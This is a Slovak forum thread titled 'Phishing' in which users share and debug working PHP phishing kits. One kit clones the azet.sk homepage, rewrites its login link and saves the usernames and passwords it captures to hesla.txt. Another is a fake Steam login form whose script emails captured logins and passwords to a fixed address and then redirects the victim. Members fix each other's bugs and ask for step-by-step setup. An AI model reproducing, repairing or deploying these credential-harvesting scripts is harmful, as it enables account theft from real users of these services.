Phishing

Anti

Ale on skusal curl()

Dawn

Anti napísal:Ale on skusal curl()

Tak potom nič...

killergage

na orangeportal.sk nieje nejaký phishing.
Súrne zhánam.

final

mnoo, toto sa sem nehodí, aaale..
ja zháňam, resp. sa pokúšam urobiť na pobox.sk

mám takú startpage, kde len kliknem na odkazy a automaticky ma to prihlasuje, aby som nemusel zadávať meno, heslo atď, nebavia ma také veci.. tak si to trošku automatizujem..
ak by to niekto mal, tak by bodlo.. (môj problém spočíva v tom, že jednak ja tam pošlem tie _POST cez curl, ale ten script setuje cookies a cez curl maximálne môžem uložiť [aj vypísať] cookies, ktoré ten script chce nastaviť, potom rozparsujem, ale výsledok je na houby, bo keď nastavím cookie, tak sa ukladá aj pre ktorú doménu patrí, čiže pobox-u sa to nezobrazí.. [možno tam je taká možnosť, uložiť cookie cez curl automaticky, nejak selectnúť prehliadač [abo ako to lepšie vystihnúť], avšak o tom siiilno pochybujem..])..
thx...

... · Príspevok od používateľa **...** » 19 máj 2006, 18:05

Finalway napísal: ... : pls, nechodievaj radšej do tejto sekcie, lebo jediný kto je mimo si ty..

... drahúšik, ak chceš užívateľa prihlásiť na azet, tak POSTovaním zo svojho servera si nepomôžeš, akosi mu totiž stále bude chýbať autentifikačný koláčik (cookie). Takže jedine presmerovať a parametre v URL.

Edit: no vidím (príspevok vyššie), že si na to prišiel už aj sám. Takže kto je tu mimo? Obrázok

final

... napísal:... drahúšik, ak chceš užívateľa prihlásiť na azet, tak POSTovaním zo svojho servera si nepomôžeš, akosi mu totiž stále bude chýbať autentifikačný koláčik (cookie). Takže jedine presmerovať a parametre v URL.

Edit: no vidím (príspevok vyššie), že si na to prišiel už aj sám. Takže kto je tu mimo?

(drahúšika máš niekde tam medzi nohami na mydlenie po nociach)... stále si mimo a stále trepeš tie isté hovadiny.. bol si ty vlastne niekedy na azete? očividne nie, nakoľko tam používajú self-created autentifikáciu (session - i9), takže o koláčikoch mi tu nevyprávaj, tie sa týkajú pobox-u..
no skús teraz trošku inteligentne niečo vypotiť.. na to ale zrejme nemáš..

... · Príspevok od používateľa **...** » 20 máj 2006, 0:20

Finalway napísal:stále si mimo a stále trepeš tie isté hovadiny.. bol si ty vlastne niekedy na azete? očividne nie, nakoľko tam používajú self-created autentifikáciu (session - i9), takže o koláčikoch mi tu nevyprávaj, tie sa týkajú pobox-u..

...ROFL, tak oni sú vážne ešte tupší, ako som si myslel Obrázok

tak to je výborné potom Obrázok

Samozrejme máš pravdu, neviem ako som si toto mohol nevšimnúť Obrázok

. Ospravedlňujem sa a želám pekný deň Obrázok

VIP721

Ide vam to niekomu??? Tu upravenu verziu od Anti. Mne otvori index.php ako by malo, potom subor login.php neviem lebo ho neako nevidno a rovno ma hodi na login azetu pricom ma ale nelogne a v subore hesla.txt kde mam chmod 777 nie je nic. Je proste prazdny.

//ok uz to ide ale aj tak mam jeden dotaz. Ako vie ten login.php ze premenná nick je nick a premenná heslo ze je heslo?

VIP721

+dalsia vec

mam tu jeden formular

Kód: Vybrať všetko

	<form method="POST" action="http://v1p.ic.cz/phis/steam/steam.php">

	    <!--webbot bot="SaveResults" U-File="fpweb:///_private/form_results.csv" S-Format="TEXT/CSV" S-Label-Fields="TRUE" -->

		<p><b><font size="2">Login:</font></b> <input type="text" name="login" id="login" size="20"></p>

		<p><b><font size="2">Heslo: </font> </b> 	<input type="password" name="heslo" id="heslo" size="20">

		<p>&nbsp;<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;

		<input type="submit" value="Odoslať" name="B1" id="screenshots"></form>

ktorym vyvolam script

Kód: Vybrať všetko

<? 
 
$to = "[email protected]";
$extra = "From: $login\r\nReply-To: 
$login\r\n"; 
$subject = "Heslo"; 
$mess = "Steam pass: $login heslo: $heslo"; 

mail ($to, $subject, $mess, $extra);  

//header("location: http://v1p.ic.cz/phis/steam/dakujeme.html"); 

?>

Nemam tam niekde chybu?? ide o to aby po stlaceni submit mi odosle premennu login a premennu heslo na mail. Neviem ci ic.cz podporuje funkciu mail taze sa ma na to nepytajte. nehlasi to ziadnu chybu.

a odkial ma ten druhy skript vediet co je ma byt v $login a $heslo? neviem ci ma ic.cz register globals on, ale ked nie tak najprv musis ziskat hodnotu tych to dvoch premenych zo superglobalneho pola $_POST

VIP721

Som zistil preco ten azet phis funguje ako ma....

vo formulari, je tam je tam parameter id= a preto vie dalsi script ktory je vykonany formularom co znamenaju tie premenne. ale aj tak to nejde

+nasiel opravil som si dalsiu chybu. zevraj premenne nemozu byt v uvodzovkach.

Teraz kod vyzera takto:
formular.html

Kód: Vybrať všetko

	<form method="POST" action="http://v1p.netfast.org/phis/steam/steam.php">

	    <!--webbot bot="SaveResults" U-File="fpweb:///_private/form_results.csv" S-Format="TEXT/CSV" S-Label-Fields="TRUE" -->

		<p><b><font size="2">Login:</font></b> <input type="text" name="login" size="20"></p>

		<p><b><font size="2">Heslo: </font> </b> 	<input type="password" name="heslo" size="20">

		<p>&nbsp;<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;

		<input type="submit" value="Odoslať" name="B1" id="screenshots"></form>

steam.php

Kód: Vybrať všetko

<? 
 
$to = "[email protected]";
$extra = "From: $login\r\nReply-To: 
$login\r\n"; 
$subject = "Heslo"; 
$mess = "Steam pass:" $login "heslo:" $heslo; 

mail ($to, $subject, $mess, $extra);  

header("location: http://v1p.netfast.org/phis/steam/dakujeme.html"); 

?>

Specailne diky Anti-mu

programator

subor steam.php ma vyzerat takto(hovoril som ti to aj na ICQ) a je s niekolkymi vylepseniami... :

Kód: Vybrať všetko

<? 
 
$login = $_POST['login'];
$heslo = $_POST['heslo'];

$to = "[email protected]";
$extra = "From: " . $login . "\r\nReply-To: " . $login . "\r\n"; 
$subject = "Heslo"; 
$mess = "Steam pass: " . $login . " \n heslo: " . $heslo; 

if (@mail ($to, $subject, $mess, $extra)) header("location: http://v1p.netfast.org/phis/steam/dakujeme.html"); 
else echo "Chyba pri odosielani e-maliu...";

?>

VIP721

Prepac blblo mi icq tak som od teba nedostal nic zrozumitelne... ani ja tebe som nevedel pisat. Diky. A mohol by som poprosit aj neake to vysvetlenie preco si to tak spravil? Mastermind mi nieco pisal ale neko zlozito to znelo.

programator

VIP721 napísal:Prepac blblo mi icq tak som od teba nedostal nic zrozumitelne... ani ja tebe som nevedel pisat. Diky. A mohol by som poprosit aj neake to vysvetlenie preco si to tak spravil? Mastermind mi nieco pisal ale neko zlozito to znelo.

Pretoze ked si tam mal premennu $login a ak je v konfiguracii PHP servera nastavena register globals na off, tak v tej premennej $login nebudes mat nic, pretoze to pouzivas pre viac skriptov...a hodnota tej premennej sa neprenasa lebo mas vypnute register globals... tak to potrebujes preniest cez tzv. "Superglobalne premenne" (najdes ich na stranke www.php.net a zadaj do search napriklad $_GET)

Old Dirty Bastard

Anti napísal:teraz to je funkcne :

------index.php-------

Kód: Vybrať všetko

<?
$open=FOpen("http://azet.sk/","r"); // otvoríme súbor na čítanie
while(!feof($open))
{
$read .= fread($open,1024);
} 
FClose($open); // zatvoríme súbor
$nahradene=str_replace("http://moje.azet.sk/prihlasenie.phtml?KDE=www.azet.sk%2Findex.phtml%3F","login.php",$read); // Nahradíme login súbor azetu za náš za náš súbor
echo $nahradene; // a teraz to celé zobrazíme
?>

----login------

Kód: Vybrať všetko

<?
$file = @FOpen("hesla.txt", "r");
$data = @FRead($file,FileSize("hesla.txt"));
@FClose($file);

$file = FOpen("hesla.txt", "w");
FWrite($file,$data.$nick." : ".$heslo."\n");
FClose($file);
header("location: http://moje.azet.sk/prihlasenie.phtml?KDE=www.azet.sk%2Findex.phtml%3&nick=");
?>

mne píše toto ak to dám na svoj host

Kód: Vybrať všetko

Warning: fopen(hesla.txt) [function.fopen]: failed to open stream: Permission denied in /domains1/do152700/public/www_root/lol/login.php on line 6

Warning: fwrite(): supplied argument is not a valid stream resource in /domains1/do152700/public/www_root/lol/login.php on line 7

Warning: fclose(): supplied argument is not a valid stream resource in /domains1/do152700/public/www_root/lol/login.php on line 8

Warning: Cannot modify header information - headers already sent by (output started at /domains1/do152700/public/www_root/lol/login.php:6) in /domains1/do152700/public/www_root/lol/login.php on line 9

gwixt

Old Dirty Bastard napísal:mne píše toto ak to dám na svoj host

tomu suboru 'hesla.txt' musis nastavit prislusne pristupove prava

Old Dirty Bastard

aha nastavil som chmod 777 a ide to thx

Old Dirty Bastard

už to ide ale ked sa niekto prihlási nahlasi mu chybu to je dobre??
mne heslo zapíse do toho textoveho takže to je ok ale bude mu to neaké podozrivé ked napíše meno heslo na azete a vyhodí mu chybu..
napíše toto

Kód: Vybrať všetko

 Bad Request
Your browser sent a request that this server could not understand.

Apache/1.3.34 Server at www.azet.sk Port 80

maskov1

mohli by ste pls sem napisat vsetko co mam spravit aby som to mal? myslim taky vypis toho.... chapte to takto:
ligin...
index.php
dakujeme.php...
rad by som si to spravil ael mam v tom chaos

vopred diki

killergage

chcel som sa spitat ci to este funguje tento script ???
Prosim odpovedzte.

Phishing

orangeportal

funguje to ešte